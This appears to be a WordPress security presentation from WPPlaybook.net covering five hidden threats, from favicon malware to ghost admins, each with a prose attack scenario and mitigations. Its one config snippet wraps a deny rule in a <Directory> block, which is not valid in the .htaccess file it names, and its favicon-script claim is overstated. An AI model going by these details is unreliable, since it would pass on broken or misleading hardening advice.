Navigating the dark web: Protecting your site from hidden threats

WPAleks

Founder and CEO at WPPlaybook.net

Poor cyberhygiene

BIGGEST THREAT EVER

If you think you know everything about cyber security, you must be the biggest threat to your company.

Poor cyberhygiene

Poor cyber hygiene includes various risky practices, such as using weak passwords, neglecting security updates, clicking on suspicious email links, and failing to implement proper security measures. A recent study revealed that a significant number of security breaches stem from poor cyber hygiene. To minimize risks, it’s essential to prioritize strong password creation, use unique credentials for different accounts, and maintain regular cybersecurity housekeeping.

1.Favicon-based malware injection

2.Fake WordPress plugin updates (Supply chain attacks)

3.Abandoned admin accounts (Ghost admins)

4.Fake admin login pages

5.Hidden Malware in media files

Explanation

1.Favicon-based malware injection

Attackers can disguise malware or malicious JavaScript inside .ico (favicon) files. Since these files are often cached and overlooked in security scans, they provide a sneaky way to execute malicious code.

Example attack scenario:

An attacker gains access to a website and replaces the favicon.ico file with one containing an embedded script that logs keystrokes. When users load the site, their login credentials get stolen.

Mitigation strategy

Use Content Security Policy (CSP) headers to restrict which domains can load JavaScript.

Regularly verify the integrity of files on your server using checksums or monitoring tools.

Store favicons and other assets in a secure CDN or trusted repository instead of on your main server.

Restrict file upload permissions to prevent unauthorized users from modifying static assets.

2.Fake WordPress plugin updates (Supply chain attacks)

Attackers can trick WordPress users into installing malicious plugin updates by compromising legitimate plugin repositories or creating fake versions of popular plugins.

Once installed, these updates can inject malware, steal user data, or create hidden backdoors for hackers.

This scenario often occurs with GPL-FREE sites.

Example attack scenario:

You see an update notification for a plugin you use, but it’s a hacked version uploaded by an attacker. You update it, thinking it’s safe, but the new version adds a hidden admin user or steals information from your WooCommerce store.

Mitigation strategy

Download plugins only from trusted sources (WordPress.org, official developer websites, or reputable marketplaces like CodeCanyon).
Enable automatic updates only for trusted plugins—use the wp-cli or Safe Updates from tools like Cloudways to test updates before applying them.
Monitor plugin changes using WordFence or WP Activity Log to get alerts when files are modified.
Check plugin reviews and update logs before installing updates if something seems suspicious, wait before updating.

3.Abandoned admin accounts (Ghost admins)

Over time, website owners and teams create multiple admin accounts for developers, contractors, or team members. If old accounts aren’t deleted, attackers can target them, especially if those users had weak or reused passwords.

Example attack scenario:

A former employee had an admin account that was never deleted. Attackers find it and use a leaked password from another data breach to log in and take over the site.

Mitigation strategy

Review all user accounts regularly—delete or downgrade old admin accounts to lower roles like "Subscriber."
Use a plugin like WP Security Audit Log to track logins and see if an inactive admin suddenly logs in.
Enable 2FA for all admin users to prevent logins with leaked credentials.
Implement automatic logout for inactive accounts using a plugin like Inactive Logout.

4.Fake admin login pages

Attackers can inject a fake WordPress login page into your site and trick you (or your team) into entering credentials. These credentials are then stolen and used to log in to your real WordPress dashboard.

Example attack scenario:

A hacked plugin or theme injects a fake WordPress login page at yourwebsite.com/wp-admin2. When you try to log in, your credentials are sent to an attacker.

Mitigation strategy

Always check the browser URL before logging in—your WordPress login should always be at yourwebsite.com/wp-admin or yourwebsite.com/wp-login.php.
Rename the WordPress login URL using plugins like WPS Hide Login to prevent attackers from easily creating a fake page.
Install a security plugin like WordFence to detect and remove unauthorized login pages.
Use password managers to auto-fill login credentials, this prevents you from entering credentials into a fake form.

5.Hidden Malware in media files

Hackers often hide malicious code inside images, PDFs, or other media files uploaded to WordPress. These files sit unnoticed and can be triggered later to execute malicious scripts.

Example attack scenario:

An attacker uploads an infected PDF or image via a contact form or user-upload area. This file contains a hidden script that, when accessed, creates a backdoor or injects spammy links into your site.

Mitigation strategy

Limit file upload permissions—only allow trusted users to upload media files.
Use a malware scanner like WordFence or Sucuri to scan media files for hidden scripts.

Regularly review and delete unused files in the media library to reduce the risk of hidden threats.
Disable PHP execution in the uploads folder using .htaccess:

<Directory "/wp-content/uploads">
    <FilesMatch "\.(php|phtml|shtml|cgi|pl|exe|sh)$">
        Order Allow,Deny
        Deny from all
    </FilesMatch>

</Directory>

WRAPPING UP

Many WordPress security threats are not obvious at first but can have a major impact on your website. By actively monitoring your site, restricting permissions, and using security plugins, you can stay ahead of these hidden dangers.